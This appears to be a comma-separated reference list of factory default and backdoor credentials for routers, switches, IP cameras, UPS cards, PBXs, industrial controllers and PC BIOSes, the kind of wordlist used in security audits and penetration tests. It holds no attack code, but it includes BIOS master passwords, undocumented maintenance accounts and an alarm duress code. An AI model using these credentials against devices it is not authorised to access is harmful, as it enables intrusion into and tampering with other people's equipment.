Firewall,3C16770,HTTP,admin,password,Admin, -3COM,LANplex,2500,Telnet,debug,synnet,, -3COM,LANplex,2500,Telnet,tech,,Admin, -3COM,LANplex,2500,Telnet,tech,tech,, -3COM,LinkBuilder,,Telnet,tech,tech,Admin, -3COM,LinkSwitch,2000/2700,Telnet,tech,tech,, -3COM,NetBuilder,,,,admin,User,SNMP_READ -3COM,NetBuilder,,Multi,admin,,Admin, -3COM,NetBuilder,,SNMP,,ANYCOM,,SNMP disabled by default -3COM,NetBuilder,,SNMP,,ANYCOM,snmp-read,SNMP disabled by default -3COM,NetBuilder,,SNMP,,ILMI,snmp-read, -3COM,NetBuilder,,SNMP,,ILMI,snmp-read,SNMP disabled by default -3COM,Netbuilder,,HTTP,Root,,Admin,http://10.1.0.1 -3COM,Netbuilder,,Multi,admin,,Admin, -3COM,OCR-812,,,root,!root,, -3COM,OfficeConnect 812 ADSL,,Multi,Administrator,admin,Admin, -3COM,OfficeConnect 812 ADSL,,Multi,adminttd,adminttd,Admin, -3COM,OfficeConnect 812 ADSL,01.50-01,Multi,admin,,Admin, -3COM,OfficeConnect ADSL Wireless 11g Firewall Router,3CRWDR100-72,HTTP,,admin,Admin,http://192.168.1.1 -3COM,OfficeConnect ADSL,3CRWDR100-72,HTTP,,admin,Admin,http://192.168.1.1 -3COM,OfficeConnect ISDN Routers,5x0,Telnet,,PASSWORD,Admin, -3COM,OfficeConnect Remote Router,812 ADSL and 840 SDSL,Telnet,root,!root,Administrator, -3COM,OfficeConnect Wireless AP,,,,admin,Administrator, -3COM,OfficeConnect Wireless,,HTTP,,admin,Admin, -3COM,OfficeConnect,812,Multi,root,!root,Admin, -3COM,Router,3000/5000 Series,Boot Prompt,,,Administrator,3COM Solution ID 3KB6942 -3COM,SS III Switch,4xxx (4900 - sure),Telnet,recovery,recovery,resets_all_to_default,u need to power off unit. 
tbl_ -3COM,SuperStack 3 Switch,4900,Console,recover,recover,Administrator, -3COM,SuperStack 3,4400-49XX,Multi,manager,manager,User can access/change operational setting but not security settings, -3COM,SuperStack 3,4XXX,Multi,admin,,Admin, -3COM,SuperStack 3,4XXX,Multi,monitor,monitor,User, -3COM,SuperStack II Switch,1100/3300,Console,3comcso,RIP000,initialize, -3COM,SuperStack II Switch,1100/3300,Telnet,admin,,Administrator, -3COM,SuperStack II Switch,1100/3300,Telnet,manager,manager,Manager, -3COM,SuperStack II Switch,1100/3300,Telnet,monitor,monitor,Monitor, -3COM,SuperStack II Switch,1100/3300,Telnet,security,security,Admin, -3COM,SuperStack II Switch,1100/3300,Telnet,security,security,Administrator, -3COM,SuperStack II Switch,2200,Telnet,debug,synnet,, -3COM,SuperStack II Switch,2700,Telnet,tech,tech,, -3COM,SuperStack II Switch,2700,Telnet,tech,tech,Admin, -3COM,SuperStack III Switch,4XXX,Multi,manager,manager,Admin, -3COM,SuperStack III Switch,4XXX,Multi,recovery,recovery,Reset, -3COM,Switch,3300XM,Multi,admin,admin,Admin, -3COM,US Robotics ADSL Router,8550,HTTP,,12345,Administrator, -3COM,Wireless AP,ANY,Multi,admin,comcomcom,Admin,Works on all 3com wireless APs -3COM,Wireless AP,Any,Multi,admin,comcomcom,Admin, -3COM,cellplex,,Multi,,,Admin, -3COM,cellplex,,Multi,admin,admin,Admin, -3COM,cellplex,7000,,operator,,Admin, -3COM,cellplex,7000,Telnet,admin,admin,Admin, -3COM,officeconnect,,Multi,,,Admin, -3COM,superstack II Netbuilder,11.1,Multi,,,Admin, -3COM,superstack II,1100/3300,,3comcso,RIP000,initialize,resets all pws to defaults -3Com,,1.25,,root,letmein,, -3Com,3CRWDR100A-72,2.06 (Sep 21 2005 14:24:48),HTTP,admin,1234admin,Admin,Provided by Ya.com provider in Spain -3Com,AirConnect Access Point,,,,comcomcom,, -3Com,CoreBuilder,6000,,debug,tech,, -3Com,Internet Firewall,3C16770,HTTP,admin,password,Admin, -3Com,LinkSwitch and CellPlex,,,tech,tech,, -3Com,OfficeConnect 5×1,at least 5.x,,,PASSWORD,, -3Com,Shark 
Fin,Comcast-supplied,HTTP,User,Password,Diagnostics page,192.160.100.1 -3Com,SuperStack II Switch 1100,,,manager,manager,, -3Com,SuperStack II Switch 2200,,,debug,synnet,, -3Com,SuperStack II Switch 3300,,,manager,manager,, -3Com,SuperStack/CoreBuilder,,,admin,,, -3Com,SuperStack/CoreBuilder,,,write,,, -3Com,Switch 3000/3300,,,monitor,monitor,, -3Com,e960,,HTTP,Admin,Admin,Administrator, -3M,VOL-0215 etc.,,SNMP,volition,volition,Admin,for Volition fibre switches -3M,Volition Fibre Switches,VOL-0215 etc.,SNMP,volition,volition,Admin, -3M,Volition,VOL-0215,,volition,,Administrator,http://multimedia.3m.com/mws/mediawebserver?6666660Zjcf6lVs6EVs666xa9COrrrrQ- -3M,Volition,VOL-0215,HTTP,VOL-0215,,Administrator,http://multimedia.3m.com/mws/mediawebserver?6666660Zjcf6lVs6EVs666xa9COrrrrQ- -3com,3C16405,,Multi,admin,,Admin, -3com,3CRADSL72,1.2,Multi,,1234admin,Admin,snmp open by default with public/private community -3com,3c16405,,Console,Administrator,,Admin, -3com,3c16405,,Multi,,,Admin, -3com,3comCellPlex7000,,,tech,tech,, -3com,812,,HTTP,Administrator,admin,Admin, -3com,CB9000/4007,3,Console,FORCE,,Admin,This will recover a lost password and reset the switch config to Factory Default -3com,Cable Managment System SQL Database (DOSCIC DHCP),Win2000 & MS,,DOCSIS_APP,3com,Admin, -3com,CellPlex,7000,Telnet,root,,Admin, -3com,CellPlex,7000,Telnet,tech,,Admin, -3com,CellPlex,7000,Telnet,tech,tech,Admin, -3com,HiPerACT,v4.1.x,Telnet,admin,,Admin, -3com,Home Connect,,,User,Password,, -3com,LANplex,2500,Telnet,,admin,Admin, -3com,NBX100,2.8,,administrator,0,, -3com,Netbuilder,,Multi,admin,,Admin, -3com,OfficeConnect 812 ADSL,,Multi,adminttd,adminttd,Admin, -3com,OfficeConnect 812 ADSL,01.50-01,Multi,admin,,Admin, -3com,OfficeConnect Wireless 11g Cable/DSL Gateway,,HTTP,,admin,Admin, -3com,OfficeConnect Wireless 11g,,HTTP,,admin,Admin, -3com,SS III Switch,4xxx (4900 - sure),Telnet,recovery,recovery,resets_all_to_default,u need to power off unit. 
tbl_ -3com,Superstack II 3300FX,,,admin,,, -3com,Switch 3000/3300,,,Admin,3com,, -3com,Switch,3300XM,Multi,admin,admin,Admin, -3com,cellplex,,Multi,,,Admin, -3com,cellplex,,Multi,admin,admin,Admin, -3com,cellplex,7000,Multi,admin,admin,Admin,RS-232/telnet -3com,cellplex,7000,Telnet,operator,,Admin, -3com,corebuilder,7000/600/3500/2500,,defug,synnet,, -3com,office connect,11g,Multi,admin,,User, -3com,officeconnect,,Multi,,,Admin, -3com,officeconnect,,Multi,admin,,Admin, -3com,super,,Telnet,admin,,Admin, -3com,superstack II Netbuilder,11.1,Multi,,,Admin, -3ware,3DM,,HTTP,Administrator,3ware,Admin, -3xLogic,IP Camera system,,HTTP,admin,12345,, -5200-Serie,,,,,,, -8level,,WRT-150,,admin,admin,,192.168.1.1 -ABB,Controller,AC 800M,,service,ABB800xA,,https://library.e.abb.com/public/f355a67551218ae7c1257dc0003298c5/3BDS021515-600_-_en_AC_800M_6.0_PROFINET_IO_Configuration.pdf -ABB,Ethernet Adapter Module,SREA-01,http:80/tcp,admin,admin,,https://www.inverterdrive.com/file/ABB-SREA-01-Manual -ACC,Congo/Amazon/Tigris,All,Multi,netman,netman,, -ACCTON,CheetahChassis Workgroup Switch,3714,SNMP/web/Telnet,admin,,, -ACCTON,CheetahChassis Workgroup Switch,3714,SNMP/web/Telnet,manager,manager,, -ACCTON,CheetahChassis Workgroup Switch,3714,SNMP/web/Telnet,monitor,monitor,, -ACCTON,Wirelessrouter,,,,0000,Administrator, -ACCTON,Wirelessrouter,T-online,HTTP,,0,Admin,YEAHH -ACIE SECURITE,ADIP,ANY,HTTP,adip,admin,Administrator,http://www.acie-server.com/CONTROL_D_ACCES/ADIP/Notice/ADIP_US.pdf -ACIE SECURITE,ADIP,ANY,HTTP,adip,consul,Consultant,http://www.acie-server.com/CONTROL_D_ACCES/ADIP/Notice/ADIP_US.pdf -ACIE SECURITE,ADIP,ANY,HTTP,adip,insta,Installer,http://www.acie-server.com/CONTROL_D_ACCES/ADIP/Notice/ADIP_US.pdf -ACTi,IP Camera,All Models,http://192.168.0.100,admin,123456,,https://www.acti.com/products/cameras -ADC Kentrox,Pacesetter Router,,Telnet,,secret,, -ADIC,Scalar 100/1000,,HTTP,admin,secure,Admin, -ADIC,Scalar i2000,,Multi,admin,password,Admin, -ADP,ADP Payroll HR 
Database,Any,Multi,sysadmin,master,Admin, -ADT,Safewatch Pro3000,,,,2580,Duress,This is a 'duress' code and likely on multiple ADT models as set by technicians. | http://krebsonsecurity.com/2013/01/does-your-alarm-have-a-default-duress-code/ -AIRAYA Corp,AIRAYA WirelessGRID,,,Airaya,Airaya,Administrator,The default IP address is 192.168.1.70. | http://www.airaya.com/support/guides/WirelessGRID-Manual_O.pdf -ALCATEL,4400,,Console,mtcl,,User, -ALLNET,ALL 130DSL,,,admin,password,, -ALLNET,ALL129DSL,,,admin,admin,Admin, -ALLNET,T-DSL Modem,Software Version:,HTTP,admin,admin,Admin, -ALLNET,T-DSL Modem,v1.51,HTTP,admin,admin,Admin, -AMBIT,ADSL,,Telnet,root,,Admin, -AMI,AT 49,,Multi,,,Admin, -AMI,PC BIOS,,Console,,A.M.I,Admin, -AMI,PC BIOS,,Console,,AM,Administrator, -AMI,PC BIOS,,Console,,AMI,Administrator, -AMI,PC BIOS,,Console,,AMI.KEY,Admin, -AMI,PC BIOS,,Console,,AMIDECOD,Admin, -AMI,PC BIOS,,Console,,AMI~,Admin, -AMI,PC BIOS,,Console,,BIOSPASS,Admin, -AMI,PC BIOS,,Console,,CMOSPWD,Admin, -AMI,PC BIOS,,Console,,aammii,Admin, -AMI,PC BIOS,,Console,,amipswd,Admin, -AMX,CSG,,,admin,1988,Administrator,http://www.amx.com/techsupport/PDFs/981.pdf -AMX,Endeleo UDM-0102,,,,admin,Administrator,http://www.amx.com/techsupport/PDFs/981.pdf -AMX,Endeleo UDM-0404,,,,admin,Administrator,http://www.amx.com/techsupport/PDFs/981.pdf -AMX,Endeleo UDM-0808-SIG,,,administrator,password,Administrator,http://www.amx.com/techsupport/PDFs/981.pdf -AMX,Environmental Controls ENV-VST-C,,,,1988,Administrator,http://www.amx.com/techsupport/PDFs/981.pdf -AMX,IS-SPX-1000,,,,,Administrator,http://www.amx.com/techsupport/PDFs/981.pdf -AMX,MAX Server,,,root,mozart,Administrator,http://www.amx.com/techsupport/PDFs/981.pdf -AMX,MAX-CSD10,,HTTP,administrator,password,Administrator,http://www.amx.com/techsupport/PDFs/981.pdf -AMX,MAX-CSE,,HTTP,administrator,password,Administrator,http://www.amx.com/techsupport/PDFs/981.pdf 
-AMX,MET-ECOM/-D,,,admin,1988,Administrator,http://www.amx.com/techsupport/PDFs/981.pdf -AMX,NI Series,,,NetLinx,password,Administrator,http://www.amx.com/techsupport/PDFs/981.pdf -AMX,NI Series,,,administrator,password,Administrator,https://www.amx.com/techsupport/PDFs/981.pdf -AMX,NXA-ENET24,,,Admin,1988,Administrator,http://www.amx.com/techsupport/PDFs/981.pdf -AMX,NXA-ENET24,,,guest,guest,Guest,http://www.amx.com/techsupport/PDFs/981.pdf -AMX,NXA-ENET8POE,,,admin,1988,Administrator,http://www.amx.com/techsupport/PDFs/981.pdf -AMX,NXA-WAP1000,,,admin,1988,Administrator,http://www.amx.com/techsupport/PDFs/981.pdf -AMX,NXA-WAP250G,,,admin,1988,Administrator,http://www.amx.com/techsupport/PDFs/981.pdf -AMX,NXA-WAPZD1000 (Zone Director),,,admin,admin,Administrator,http://www.amx.com/techsupport/PDFs/981.pdf -AMX,NXR-ZGW-PRO/-ZRP-PRO,,,Admin,1988,Administrator,http://www.amx.com/techsupport/PDFs/981.pdf -AMX,NXR-ZGW/-ZRP,,,Admin,1988,Administrator,http://www.amx.com/techsupport/PDFs/981.pdf -AMX,TVM-1600,,,,admin,Administrator,http://www.amx.com/techsupport/PDFs/981.pdf -AMX,V2 Server,,,Administrator,vision2,Administrator,http://www.amx.com/techsupport/PDFs/981.pdf -AOC,zenworks 4.0,,Multi,,admin,Admin, -APC,9606 Smart Slot,,Telnet,,backdoor,Admin, -APC,AP9606 SmartSlot Web/SNMP Management Card,AOS 3.2.1 and AOS 3.0.3,telnet,(any),TENmanUFactOryPOWER,, -APC,Any,Firmware Pri,,apcuser,apc,, -APC,Call-UPS,AP9608,Console,,serial number of the Call-UPS,Administrator,(Access menu Control+P) -APC,MasterSwitch,AP9210,,apc,apc,Administrator, -APC,Powerchute Plus,4.x for Netware 3.x/4.x,Console,POWERCHUTE,APC,Administrator, -APC,SNMP Adapter,2.x,,apc,apc,, -APC,Share-UPS,AP9207,Console,,serial number of the Share-UPS,Administrator,(Access menu Control+P) -APC,Smart UPS,,Multi,apc,apc,Admin, -APC,UPS Network Management Card 2,,HTTP,readonly,apc,Read 
Only,https://www.jlab.org/Hall-D/Documents/manuals/APC%20stuff/AP9630%209631%20UPS%20Network%20Management%20Card%202%20User's%20Guide%20firmware%20V5.1.1.pdf -APC,UPS Network Management Card 2,,Telnet/SSH,device,apc,Restricted User,https://www.jlab.org/Hall-D/Documents/manuals/APC%20stuff/AP9630%209631%20UPS%20Network%20Management%20Card%202%20User's%20Guide%20firmware%20V5.1.1.pdf -APC,UPSes (Web/SNMP Mgmt Card),,HTTP,device,device,Admin,Secondary access account (next to apc/apc) -APC,USV Network Management Card,,SNMP,,TENmanUFactOryPOWER,Admin,nachzulesen unter http://www.heise.de/security/news/meldung/44899 gruss HonkHase -APC,Web/SNMP Management Card,AP9606,Multi,apc,apc,Admin, -APC,Web/SNMP Management Card,AP9606,Multi,apc,apc,Administrator, -ARtem,ComPoint - CPD-XT-b,CPD-XT-b,Telnet,,admin,Admin, -ASMAX,AR701u/ASMAX AR6024,,HTTP,admin,epicrouter,Admin, -ASMAX,AR800C2,,HTTP,admin,epicrouter,Admin, -AST,PC BIOS,,Console,,SnuFG5,Admin, -AST,PC BIOS,,Console,,SnuFG5,Administrator, -ASUS,ASUS SMTA Router,Firmware: 3.5.1.3 (C0.0.7.4) - Hardware: 1100 (AVG6002 REV:2.26A),HTTP + Telnet,admin,admin,Admin,Router / VoIP Gateway (@ 192.168.3.1) -ASUS,ASUS WL-330 Pocket Wireless Access Point,,HTTP,admin,admin,Admin,http://192.168.1.1 -ASUS,WL-500G,1.7.5.6,HTTP,admin,admin,Admin, -ATL,P1000,,Multi,Service,5678,Service Maintenance Admin,Tape Library Service Access -ATL,P1000,,Multi,operator,1234,User,Tape Library Operator Access -AVAYA,Cajun P33x,firmware before 3.11.0,SNMP,,admin,Admin,check the Bugtraq archives for more information -AVAYA,P333,,Telnet,Administrator,ggdaseuaimhrke,Admin, -AVAYA,P333,,Telnet,root,ggdaseuaimhrke,Admin, -AVAYA,g3R,v6,Console,root,ROOT500,Admin, -AVM,Fritz!Box Fon,7270,,,,,http://fritz.box -AVM,Fritz!Box,any,,,0,admin, -AWARD,PC BIOS,,Console,,1322222,Administrator, -AWARD,PC BIOS,,Console,,256256,Admin, -AWARD,PC BIOS,,Console,,256256,Administrator, -AWARD,PC BIOS,,Console,,589589,Administrator, -AWARD,PC BIOS,,Console,,589721,Administrator, 
-AWARD,PC BIOS,,Console,,,Admin, -AWARD,PC BIOS,,Console,,?award,Administrator, -AWARD,PC BIOS,,Console,,AWARD SW,Administrator, -AWARD,PC BIOS,,Console,,AWARD?SW,Administrator, -AWARD,PC BIOS,,Console,,AWARD_PW,Administrator, -AWARD,PC BIOS,,Console,,AWARD_SW,Admin, -AWARD,PC BIOS,,Console,,AWARD_SW,Administrator, -AWARD,PC BIOS,,Console,,Award,Admin, -AWARD,PC BIOS,,Console,,Award,Administrator, -AWARD,PC BIOS,,Console,,BIOS,Admin, -AWARD,PC BIOS,,Console,,BIOS,Administrator, -AWARD,PC BIOS,,Console,,CONCAT,Administrator, -AWARD,PC BIOS,,Console,,CONDO,Admin, -AWARD,PC BIOS,,Console,,CONDO,Administrator, -AWARD,PC BIOS,,Console,,HELGA-S,Administrator, -AWARD,PC BIOS,,Console,,HEWITT RAND,Admin, -AWARD,PC BIOS,,Console,,HEWITT RAND,Administrator, -AWARD,PC BIOS,,Console,,HLT,Administrator, -AWARD,PC BIOS,,Console,,PASSWORD,Admin, -AWARD,PC BIOS,,Console,,PASSWORD,Administrator, -AWARD,PC BIOS,,Console,,SER,Administrator, -AWARD,PC BIOS,,Console,,SKY_FOX,Administrator, -AWARD,PC BIOS,,Console,,SWITCHES_SW,Administrator, -AWARD,PC BIOS,,Console,,SW_AWARD,Admin, -AWARD,PC BIOS,,Console,,SW_AWARD,Administrator, -AWARD,PC BIOS,,Console,,SZYX,Administrator, -AWARD,PC BIOS,,Console,,Sxyz,Admin, -AWARD,PC BIOS,,Console,,Sxyz,Administrator, -AWARD,PC BIOS,,Console,,TTPTHA,Admin,bea2 hash -AWARD,PC BIOS,,Console,,TTPTHA,Administrator, -AWARD,PC BIOS,,Console,,ZAAADA,Administrator, -AWARD,PC BIOS,,Console,,aLLy,Administrator, -AWARD,PC BIOS,,Console,,aPAf,Admin, -AWARD,PC BIOS,,Console,,aPAf,Administrator, -AWARD,PC BIOS,,Console,,admin,Administrator, -AWARD,PC BIOS,,Console,,alfarome,Admin, -AWARD,PC BIOS,,Console,,alfarome,Administrator, -AWARD,PC BIOS,,Console,,award.sw,Administrator, -AWARD,PC BIOS,,Console,,award_?,Administrator, -AWARD,PC BIOS,,Console,,award_ps,Administrator, -AWARD,PC BIOS,,Console,,awkward,Administrator, -AWARD,PC BIOS,,Console,,biosstar,Administrator, -AWARD,PC BIOS,,Console,,biostar,Admin, -AWARD,PC BIOS,,Console,,biostar,Administrator, -AWARD,PC 
BIOS,,Console,,condo,Admin, -AWARD,PC BIOS,,Console,,condo,Administrator, -AWARD,PC BIOS,,Console,,djonet,Administrator, -AWARD,PC BIOS,,Console,,efmukl,Administrator, -AWARD,PC BIOS,,Console,,g6PJ,Administrator, -AWARD,PC BIOS,,Console,,h6BB,Admin, -AWARD,PC BIOS,,Console,,h6BB,Administrator, -AWARD,PC BIOS,,Console,,j09F,Admin, -AWARD,PC BIOS,,Console,,j09F,Administrator, -AWARD,PC BIOS,,Console,,j256,Administrator, -AWARD,PC BIOS,,Console,,j262,Admin, -AWARD,PC BIOS,,Console,,j262,Administrator, -AWARD,PC BIOS,,Console,,j322,Administrator, -AWARD,PC BIOS,,Console,,j64,Admin, -AWARD,PC BIOS,,Console,,j64,Administrator, -AWARD,PC BIOS,,Console,,lkw peter,Administrator, -AWARD,PC BIOS,,Console,,lkwpeter,Admin, -AWARD,PC BIOS,,Console,,lkwpeter,Administrator, -AWARD,PC BIOS,,Console,,setup,Admin, -AWARD,PC BIOS,,Console,,setup,Administrator, -AWARD,PC BIOS,,Console,,t0ch20x,Admin, -AWARD,PC BIOS,,Console,,t0ch20x,Administrator, -AWARD,PC BIOS,,Console,,t0ch88,Administrator, -AWARD,PC BIOS,,Console,,wodj,Admin, -AWARD,PC BIOS,,Console,,wodj,Administrator, -AWARD,PC BIOS,,Console,,zbaaaca,Administrator, -AWARD,PC BIOS,,Console,,zjaaadc,Administrator, -AWARD,PC BIOS,,Console,Administrator,admin,Admin, -AWARD,PC BIOS,1.0A,Console,,,Admin, -AXIS,200 V1.32,,,admin,,, -AXUS,AXUS YOTTA,,Multi,,0,Admin,Storage DAS SATA to SCSI/FC -Acc/Newbridge,Congo/Amazon/Tigris,Any,,netman,netman,, -Accelerated Networks,DSL CPE and DSLAM,,Telnet,sysadm,anicust,, -Accelerated,DSL CPE and DSLAM,,Telnet,sysadm,anicust,, -Accton,Gigabit Switches,,Telnet/SSH,__super,(caclulated),Administrator,The password is based on the MAC address--see http://www.vettebak.nl/hak/ for info. Devices sold by 3Com & Dell & SMC & Foundry & EdgeCore. 
-Aceex,Modem ADSL Router,,HTTP,admin,,Admin, -Acer,517te,,Multi,,,Admin, -Acer,Phoenix,,Multi,,,Admin, -Acer,Phoenix,,Multi,,Admin,, -Acti,IP Camera system,,HTTP,admin,admin,, -Actiontec,GE344000-01,,,,,Administrator, -Actiontec,M1424WR,,HTTP,admin,password,Administrator,http://192.168.1.1/ -Actiontec,Wireless Broadband Router,,Multi,admin,password,Admin,Verizon Fios Setup -AdComplete.com,Ban Man Pro,,,Admin1,Admin1,Administrator, -AdComplete.com,Banman Pro,12,HTTP,Admin1,Admin1,Administrator,http://www.banmanpro.com/installnet40.asp -Adaptec,RAID Controller,,,Administrator,adaptec,Administrator, -Adaptec,Storage Manager PRO,all,Multi,Administrator,adaptec,Admin, -Adcon Telemetry,Telemetry Gateway,A840,terminal program,root,840sw,,http://www.adcon.com/index.php?option=com_docman&task=doc_download&gid=41&Itemid=239&lang=de -Adcon Telemetry,Wireless Modem,A440,terminal program,root,840sw,,http://www.adcon.com/index.php?option=com_docman&task=doc_download&gid=41&Itemid=239&lang=de -Adcon Telemetry,addVANTAGE,Pro 6.1,HTTP:8080/tcp,root,root,,http://adcon.com/index.php?option=com_docman&task=doc_download&gid=31&Itemid=239&lang=en -AddPac Technology,AP2120,,HTTP,root,router,Administrator, -Addon,GWAR3000/ARM8100,,HTTP,admin,admin,Admin,http://www.addon-tech.com -Adobe,CQ,,,admin,admin,Administrator,This account is used for the connection between CQ WCM and CRX. | https://docs.adobe.com/docs/v5_2/html-resources/cq5_guide_power_user/ch07s02.html#sect_default_users_and_groups -Adobe,CQ,,,author,author,,Can be used as a webmaster as it has access to the entire/content tree. 
| https://docs.adobe.com/docs/v5_2/html-resources/cq5_guide_power_user/ch07s02.html#sect_default_users_and_groups -Adobe,Experience Manager,,HTTP,admin,admin,Administrator,https://helpx.adobe.com/experience-manager/using/datasourcepool.html -Adobe,Experience Manager/CQ,,,anonymous,anonymous,,http://resources.infosecinstitute.com/adobe-cq-pentesting-guide-part-1/ -Adobe,Experience Manager/CQ,,,aparker@geometrixx.info,aparker,,http://resources.infosecinstitute.com/adobe-cq-pentesting-guide-part-1/ -Adobe,Experience Manager/CQ,,,jdoe@geometrixx.info,jdoe,,http://resources.infosecinstitute.com/adobe-cq-pentesting-guide-part-1/ -Adobe,Experience Manager/CQ,,,replication-receiver,replication-receiver,,http://resources.infosecinstitute.com/adobe-cq-pentesting-guide-part-1/ -Adobe,Vignette Connector,,HTTP,vgnadmin,vgnadmin,Administrator,http://dev.day.com/content/docs/en/crx/connectors/vignette/current.html -Adtech,AX4000,,,root,ax400,Administrator, -Adtran,MX2800,,Telnet,,adtran,, -Adtran,NetVanta,3430,HTTP,admin,password,Administrator,http://www.adtran.com/pub/Library/Quick_Start_Guides/Public_View/NetVanta%203430%20Quick%20Start%20Guide.pdf -Adtran,TSU 600 Ethernet module,All,,18364,,Admin, -Advanced Integration,PC BIOS,,Console,,Advance,Administrator, -Advantek Networks,Wireless LAN 802.11 g/b,,Multi,admin,,Admin,http://www.advanteknetworks.com/ -Aethra,Starbridge EU,,HTTP,admin,password,Admin, -AirLink Plus,RTW026,V0.80.0010 (firmware),HTTP,,admin,Administrator, -AirTies RT-210,AirTies RT-210,AirTies RT-210,Telnet,admin,admin,Admin,AirTies RT-210 -Airlink,AnyGate,GW-200,HTTP,,admin,Administrator, -Aironet,All,,,,,Administrator, -Airties,Air4310,ANY,HTTP,,,Admin,Username is not asked and the password is empty just need to click 'OK' -Airway,Transport,,,,0000,Administrator, -Aladdin,eSafe Appliance,,Console/SSH,root,kn1TG7psLu,root, -Alcatel,7300 ASAM,,TL1,SUPERUSER,ANS#150,Admin, -Alcatel,OXO,1.3,Multi,,admin,User, -Alcatel,Office 4200,,Multi,,1064,Admin, 
-Alcatel,OmniPCX Office,4.1,FTP,ftp_admi,kilo1987,Admin, -Alcatel,OmniPCX Office,4.1,FTP,ftp_inst,pbxk1064,Installer, -Alcatel,OmniPCX Office,4.1,FTP,ftp_nmc,tuxalize,NMC, -Alcatel,OmniPCX Office,4.1,FTP,ftp_oper,help1954,Operator, -Alcatel,OmniStack 6024,,Telnet,admin,switch,Admin, -Alcatel,OmniStack/OmniSwitch,,Telnet/ Console,diag,switch,Admin, -Alcatel,Omnistack/Omniswitch,,Telnet/,diag,switch,Admin, -Alcatel,Omnistack/Omniswitch,,Telnet/Console,diag,switch,Admin, -Alcatel,Omnistack/omniswitch,,Telnet,diag,switch,Admin, -Alcatel,PBX,,Port 2533,at4400,at4400,, -Alcatel,PBX,,Port 2533,dhs3mt,dhs3mt,, -Alcatel,PBX,,Port 2533,halt,tlah,, -Alcatel,PBX,,Port 2533,kermit,kermit,, -Alcatel,PBX,,Port 2533,mtcl,mtcl,, -Alcatel,PBX,4400,Port 2533,adfexc,adfexc,, -Alcatel,PBX,4400,Port 2533,at4400,at4400,, -Alcatel,PBX,4400,Port 2533,client,client,, -Alcatel,PBX,4400,Port 2533,dhs3mt,dhs3mt,, -Alcatel,PBX,4400,Port 2533,dhs3pms,dhs3pms,, -Alcatel,PBX,4400,Port 2533,halt,tlah,, -Alcatel,PBX,4400,Port 2533,install,llatsni,, -Alcatel,PBX,4400,Port 2533,kermit,kermit,, -Alcatel,PBX,4400,Port 2533,mtch,mtch,, -Alcatel,PBX,4400,Port 2533,mtcl,mtcl,, -Alcatel,PBX,4400,Port 2533,root,letacla,, -Alcatel,PBX,4400,Telnet,adfexc,adfexc,, -Alcatel,PBX,4400,Telnet,at4400,at4400,, -Alcatel,PBX,4400,Telnet,client,client,, -Alcatel,PBX,4400,Telnet,dhs3mt,dhs3mt,, -Alcatel,PBX,4400,Telnet,dhs3pms,dhs3pms,, -Alcatel,PBX,4400,Telnet,halt,tlah,,This will immediately shutdown the 4400 upon login! Account is UID 0. -Alcatel,PBX,4400,Telnet,install,llatsni,,This will immediately shutdown the 4400 upon login! Account is UID 0. 
-Alcatel,PBX,4400,Telnet,kermit,kermit,, -Alcatel,PBX,4400,Telnet,mtch,mtch,, -Alcatel,PBX,4400,Telnet,mtcl,mtcl,, -Alcatel,PBX,4400,Telnet,root,letacla,root, -Alcatel,Speedtouch,510,HTTP/Telnet,,,,Default IP 192.168.1.254/24 | http://www.speedtouch.com/support.htm -Alcatel,Timestep VPN 1520,3.00.026,Permit config and console,root,permit,Admin,Perm/Config port 38036 -Alcatel,VPN Gateway,15xx/45xx/7xxx,,root,permit,Admin, -Alcatel/Newbridge/Timestep,VPN Gateway 15xx/45xx/7xxx,Any,,root,permit,, -Alien Technology,ALR-9900,,Telnet/SSH,alien,alien,Administrator,Undocumented telnet ports: 23 and 2323. | http://seclists.org/fulldisclosure/2010/May/63 -Alien Technology,ALR-9900,,Telnet/SSH,root,alien,Administrator,Undocumented telnet ports: 23 and 2323. | http://seclists.org/fulldisclosure/2010/May/63 -Allied Telesyn,ALAT8326GB,,Multi,manager,manager,Admin, -Allied Telesyn,AT Router,,HTTP,root,,Admin, -Allied Telesyn,AT-8024(GB),,Console,,admin,Admin, -Allied Telesyn,AT-8024(GB),,HTTP,manager,admin,Admin, -Allied Telesyn,AT-AR130 (U) -10,,HTTP,Manager,friend,Admin,Default IP is192.168.242.242 -Allied Telesyn,AT8016F,,Console,manager,friend,Admin, -Allied Telesyn,Rapier G6 Switch,,,,manager,friend, -Allied Telesyn,Various Switches,,,manager,manager,Administrator, -Allied,CJ8MO E-U,,Telnet,,,Admin, -Allied,Telesyn,,Multi,manager,friend,Admin, -Allied,Telesyn,,Multi,secoff,secoff,Admin, -Allnet,ALL0275 802.11g AP,1.0.6,HTTP,,admin,Admin, -Allnet,ALL129DSL,,,admin,admin,Administrator,http://www.allnet.de/ -Allot,Netenforcer,,,admin,allot,Administrator, -Allot,Netenforcer,,,root,bagabu,Administrator, -Alteon,ACEDirector3,,console,admin,,, -Alteon,ACEDirector3,,console,admin,,Admin, -Alteon,ACEswitch,180e,HTTP,admin,admin,Admin, -Alteon,ACEswitch,180e,HTTP,admin,admin,Administrator, -Alteon,ACEswitch,180e,HTTP,admin,linga,Admin, -Alteon,ACEswitch,180e,HTTP,admin,linga,Admin, -Alteon,ACEswitch,180e,Telnet,admin,,, -Alteon,AD4,9,Console,admin,admin,Admin,Factory default 
-Alteon,Web Systems,5.2,Telnet,,14admin,Admin, -Ambit,Cable Modem 60678eu,1.12,Multi,root,root,Admin, -Ambit,Cable Modem,,Multi,root,root,Admin,Time Warner Cable issued modem -Ambit,Cable Modems,,,root,root,, -Ambit,Cable Modems,,,user,user,, -Ambit,ntl:home 200,2.67.1011,HTTP,root,root,Admin,This is the cable modem supplied by NTL in the UK -American Dynmics,IP Camera system,,HTTP,admin,admin,, -Amino,AmiNET Set Top Box,,HTTP,,leaves,Administrator,Management Password | http://www.vsicam.com/files/documents/AmiNet/AmiNet_and_AVN_Configuration_Manual.pdf -Amino,AmiNET Set Top Box,,HTTP,,snake,Administrator,Network Config Password | http://www.vsicam.com/files/documents/AmiNet/AmiNet_and_AVN_Configuration_Manual.pdf -Amitech,wireless router and access point 802.11g 802.11b,any,HTTP,admin,admin,Admin,Web interface is on 192.168.1.254 available on the LAN ports of the AP. -AmpJuke,AmpJuke,,HTTP,admin,pass,Administrator, -Amptron,PC BIOS,,Console,,Polrty,Admin, -Amptron,PC BIOS,,Console,,Polrty,Administrator, -Andover Controls,Infinity,any,Console,acc,acc,Admin,Building management system -Apache Project,,Apache,,jj,,script, -Apache,Tomcat Web Server Administration Tool,5,HTTP,admin,,Admin, -Apache,Tomcat Web Server,5,HTTP,admin,,Admin, -Apache,Tomcat,,,admin,j5Brn9,Administrator,As installed in Sun Solaris. 
